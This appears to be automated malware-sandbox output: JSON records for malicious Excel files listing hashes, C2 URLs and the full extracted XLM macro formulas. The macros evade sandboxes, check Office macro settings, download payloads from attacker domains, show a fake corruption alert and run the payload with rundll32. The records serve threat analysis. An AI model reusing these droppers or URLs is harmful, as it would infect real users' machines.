{"version":"0.2","sample":{"sample":"","kind":"file","target":"74a6713c7c197f6dfe920068fd77fa5fed3ba314b6d0ce1791b1695125c920f8"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74a6713c7c197f6dfe920068fd77fa5fed3ba314b6d0ce1791b1695125c920f8","filesize":225280,"md5":"39ec52a4d524ed61c2f888b8e02ef723","sha1":"5997974705804a6b769b6841f64a3f4bb0e2922d","sha256":"74a6713c7c197f6dfe920068fd77fa5fed3ba314b6d0ce1791b1695125c920f8","sha512":"10936d935befd88cfc81f54c897c6e16067bc45022abdd900dcfbac89ecd9e90e031f0e9427f02d78dd3cd94bda886f35bf6685e5ab7fb3c0f3a1b41d87501ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74a6713c7c197f6dfe920068fd77fa5fed3ba314b6d0ce1791b1695125c920f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ejzbYuxViN\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74a6994feb3b6a683254c2658f5fa8f2a753158be97e0582c40eee9ef0bb8143"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74a6994feb3b6a683254c2658f5fa8f2a753158be97e0582c40eee9ef0bb8143","filesize":168448,"md5":"87b5e84de7f45c50948428157d74b7c7","sha1":"35557db880e1ba2c33d09a76e0b8bf6a884513ae","sha256":"74a6994feb3b6a683254c2658f5fa8f2a753158be97e0582c40eee9ef0bb8143","sha512":"224b655937d4cc8d6cba6d2fbec9ffdc5d46f9088b786d15cd9bd9223e9c1465ccf3508b8bba886584238a62848fbbd651a3ed9e09209bdc0387178a313dd6a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74a6994feb3b6a683254c2658f5fa8f2a753158be97e0582c40eee9ef0bb8143.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mSCHPoJXG0\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74a6bf8781083d3df200dbcf4ebcba7421833bd4e925fff1bf4cba7eb1c0c345"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74a6bf8781083d3df200dbcf4ebcba7421833bd4e925fff1bf4cba7eb1c0c345","filesize":185344,"md5":"ef9a099c06c7b9e1f8bf28646033cec0","sha1":"88c128f829c929529d07ca88dabc573020d102a8","sha256":"74a6bf8781083d3df200dbcf4ebcba7421833bd4e925fff1bf4cba7eb1c0c345","sha512":"b383ecf11bb2a45329eb4d8f64ec03eb81802664b377876c6e28750fcfdaec10c463d0de3a9475f619abca831aa76e7748cfd19e891e693361405e1e8586f8fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74a6bf8781083d3df200dbcf4ebcba7421833bd4e925fff1bf4cba7eb1c0c345.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74c56bd22e22a980be241b63fa497dbf95643e83607c400bf01006a934073e42"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74c56bd22e22a980be241b63fa497dbf95643e83607c400bf01006a934073e42","filesize":214528,"md5":"68799fa7342cdd38e659dcde3bbc9014","sha1":"6fc82aec9a0f460aeeb5cad74081895083f59b7b","sha256":"74c56bd22e22a980be241b63fa497dbf95643e83607c400bf01006a934073e42","sha512":"bbbb2bc8981d1c2ca4d63353178ec440fbdf6121fec3130a8210d3c6b66fd44bee4df7d4715be21e1894cecb33576a7477cc129bbf8a6b62f14d477d9d9911ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74c56bd22e22a980be241b63fa497dbf95643e83607c400bf01006a934073e42.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wWjEHOmerL\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74e1897e185122f345206c0c5a5205a2d28237f1601ff3a55343b8ef94eba66c"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74e1897e185122f345206c0c5a5205a2d28237f1601ff3a55343b8ef94eba66c","filesize":185344,"md5":"3b6f86e51be5f88f17d9c7543fcae01f","sha1":"29f4d9b064ef3afc3838a804a2faa0a3c2ebe9e2","sha256":"74e1897e185122f345206c0c5a5205a2d28237f1601ff3a55343b8ef94eba66c","sha512":"aa73fa03348d0ba7d21a3180f191cdb418afc71ade477484109963749d9dd9e7f561e026122bb448ce4652c5cec120736094595f28b348b3bda687bc0837e174","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74e1897e185122f345206c0c5a5205a2d28237f1601ff3a55343b8ef94eba66c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74e3fa854c1616e4da62e52861dbb7b215f24d80900db04c02ed8da0c19ecd7e"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74e3fa854c1616e4da62e52861dbb7b215f24d80900db04c02ed8da0c19ecd7e","filesize":206336,"md5":"53a1ab8a88c1f2db4edfc06ba194acff","sha1":"709903f255194da4bbcea5b0e46b1dd7f92a73a9","sha256":"74e3fa854c1616e4da62e52861dbb7b215f24d80900db04c02ed8da0c19ecd7e","sha512":"d47f86e39d44daf68f0e8b4f9c157a29fa4f4b230792cd4254caf6a40e5cede35faf4741ede292f3539e58e2585fc0ae019c164556ff90eabe3edb012e0fe585","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74e3fa854c1616e4da62e52861dbb7b215f24d80900db04c02ed8da0c19ecd7e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"s3cZKXOLHM\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74f47cbf0d5b5d954e717237f3c0bd7246553b359b1c9f26bda72cfce717504a"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74f47cbf0d5b5d954e717237f3c0bd7246553b359b1c9f26bda72cfce717504a","filesize":152576,"md5":"9724e97e4cca7bf5a83e50708b8f48de","sha1":"7335556cb334915faac07dcba327db01ae609ee8","sha256":"74f47cbf0d5b5d954e717237f3c0bd7246553b359b1c9f26bda72cfce717504a","sha512":"703d0b1a219652bdceacdc4c290d545ded8bce90835a8ba975d33179f18ef12c6bd7f0461b138a2286e5933b06e62042b446ed2c34dac15d17d0c7ee1b61e1e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74f47cbf0d5b5d954e717237f3c0bd7246553b359b1c9f26bda72cfce717504a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"z1eWqdRn32\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"74fdb66b7b6da3ffb1a49e0f6b1bb2726aa531768474bd451b122daf683173ae"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"74fdb66b7b6da3ffb1a49e0f6b1bb2726aa531768474bd451b122daf683173ae","filesize":212992,"md5":"8b0aad41314a2129153619084b0f52ac","sha1":"af7f2cff15e70e98f9203b79aed696f33a384ab7","sha256":"74fdb66b7b6da3ffb1a49e0f6b1bb2726aa531768474bd451b122daf683173ae","sha512":"c656b6eebf70d6a2bb39f7768e212ca878575b66709fa767b16416712299efe1c94e551dcb5f8e89fc8a7fc9b382b53b368b354a657469fb2ba6b3a94b50013c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"74fdb66b7b6da3ffb1a49e0f6b1bb2726aa531768474bd451b122daf683173ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ptGPQCyzQX\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7511d8a996572fa70a981ecb7e63e96505a3a08a7607f82db3a90ff9d70a6db2"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"7511d8a996572fa70a981ecb7e63e96505a3a08a7607f82db3a90ff9d70a6db2","filesize":112128,"md5":"a1dd8bac7110dfce809a9129c1e8d24e","sha1":"81dc02e8703dc42784a52e26c27668cca59a9294","sha256":"7511d8a996572fa70a981ecb7e63e96505a3a08a7607f82db3a90ff9d70a6db2","sha512":"03e9ced1432cb1fa37388186d180fcf0ef87c9019cff24307659f3bc4cc8744302a37fb2a9c447f458b967e9672bd0206e97c961759ac1b087e800ecebc4356b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7511d8a996572fa70a981ecb7e63e96505a3a08a7607f82db3a90ff9d70a6db2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"752921b179c00cac6c6afe488bfc53e2770bc4544965ed5dca242d3c2af8c249"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"752921b179c00cac6c6afe488bfc53e2770bc4544965ed5dca242d3c2af8c249","filesize":206336,"md5":"6c9c09b7fa302eb9fcc24183e7ed4046","sha1":"95fe8a72c1b2e9508e16710af692ede0562e61aa","sha256":"752921b179c00cac6c6afe488bfc53e2770bc4544965ed5dca242d3c2af8c249","sha512":"073461227af7a9aaf3f1fe8db8d87181f5ce756d7204059f8efb2d7f7e984b3d269b7a028db34302e844a52e4c83553d32032fcec5847c34150e7101631e03d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"752921b179c00cac6c6afe488bfc53e2770bc4544965ed5dca242d3c2af8c249.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9yExzoA4Y6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"752a8439dc66830a8bb392ca4f3099b9d9729ed3f4d66f4c1985597493eb2638"},"analysis":{"reported":"2020-04-09T16:17:05Z","score":10},"files":[{"filename":"752a8439dc66830a8bb392ca4f3099b9d9729ed3f4d66f4c1985597493eb2638","filesize":168448,"md5":"ac04e7021d593b798c8c3acfe744fd98","sha1":"6e00e2e4772cd21155c455b20a361bd70e0c3b4c","sha256":"752a8439dc66830a8bb392ca4f3099b9d9729ed3f4d66f4c1985597493eb2638","sha512":"57d11feef57f2ca6782c8ba85ff5852cb736d91169d904b986880a05b75c7b952442a783715273ee0265e09f9e6113d1d0ba7a7abd1ee122761bed63901ec9e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"752a8439dc66830a8bb392ca4f3099b9d9729ed3f4d66f4c1985597493eb2638.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RWOQ5Tychv\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"752e9e66d6e7dc52686b0b6ed071bbdf8d788a2c866328021dddae8dbca9dd4a"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"752e9e66d6e7dc52686b0b6ed071bbdf8d788a2c866328021dddae8dbca9dd4a","filesize":168960,"md5":"0d85dd4aafd5b02aa31eb295bbb1baa9","sha1":"53ae9b6059231ecaa0aff7bb0eb93bf250e79b59","sha256":"752e9e66d6e7dc52686b0b6ed071bbdf8d788a2c866328021dddae8dbca9dd4a","sha512":"81c2ab945f8c66f6646bca63066ac9725d1d233c681bd216e9904e65d72bcc3a5b0fafc76feee7ce189de92f302b29b1992848e32a34ddbd1c9d4e5e800a4e2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"752e9e66d6e7dc52686b0b6ed071bbdf8d788a2c866328021dddae8dbca9dd4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RzEW8bArRj\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"753c5ac0af0e6048e5b0c68deeb05a750343e536e652acb488322941e233c76b"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"753c5ac0af0e6048e5b0c68deeb05a750343e536e652acb488322941e233c76b","filesize":168960,"md5":"2796ed1cede8f8218e0c91bfb43c0418","sha1":"9e254f4d2f04301b7f341bd2839d10e0e9265529","sha256":"753c5ac0af0e6048e5b0c68deeb05a750343e536e652acb488322941e233c76b","sha512":"5c792ceb371e92adda5949f5ab352072771c73e228f3260c5b54340bcdc019822a8e718fd2f365bd3ce0c06aac638b3623fddbbfa0fbec97ed958b001fa6fc49","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"753c5ac0af0e6048e5b0c68deeb05a750343e536e652acb488322941e233c76b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uOiwnQv19o\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"75478f9a3d0288b298293bd7a467636e7479a8a20bc12231d35cda3e9d8037ec"},"analysis":{"reported":"2020-04-09T16:17:06Z","score":10},"files":[{"filename":"75478f9a3d0288b298293bd7a467636e7479a8a20bc12231d35cda3e9d8037ec","filesize":225280,"md5":"9d1c52877800b16dec2bfbbe4c5c73c8","sha1":"0b2755df2d928f26057bf10cf4df1a70095345f2","sha256":"75478f9a3d0288b298293bd7a467636e7479a8a20bc12231d35cda3e9d8037ec","sha512":"1a205dd7f201d4e39818da26aec5e7bb0e0999da9e0ce5ac582c60feef04e9527e3e9f8073e2da2e6e35ac6331c116f8e6198db3ad3abe0da082dde3c72f7519","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"75478f9a3d0288b298293bd7a467636e7479a8a20bc12231d35cda3e9d8037ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 